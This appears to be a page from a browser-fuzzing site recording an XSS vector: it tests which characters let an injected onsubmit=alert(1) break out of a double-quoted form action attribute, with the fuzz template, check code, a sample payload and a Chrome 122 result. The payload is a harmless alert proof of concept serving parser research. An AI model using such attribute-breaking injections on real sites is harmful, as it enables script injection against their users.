Characters allowed to break double quotes

Chrome logo 1

Characters allowed to break double quotes in the action attribute

Created by: p3n7a90n

Created on: Sunday, June 30, 2024 at 12:02:09 PM

Updated on: Wednesday, December 11, 2024 at 8:38:37 PM

Vector type: XSS

Vector charset: UTF-8

Template used:
<form id="test" action="aaa$[chr]onsubmit=alert(1)><input/type='submit'>
Code used after fuzz:
var form = document.getElementById("test");
if (typeof form.onsubmit === 'function') {
log(String.fromCharCode($[i]))
  }
Your browser was detected as:
Detecting... Detecting... Detecting... Detecting...

Sample payloads

<form id="test" action="aaaonsubmit=alert(1)><input/type='submit'>

Fuzz results

Chrome logo
Chrome 122.0.0.0 desktop macOS 10.15.7

Updated

Sun Jun 30 2024
Found 1 result
Loading...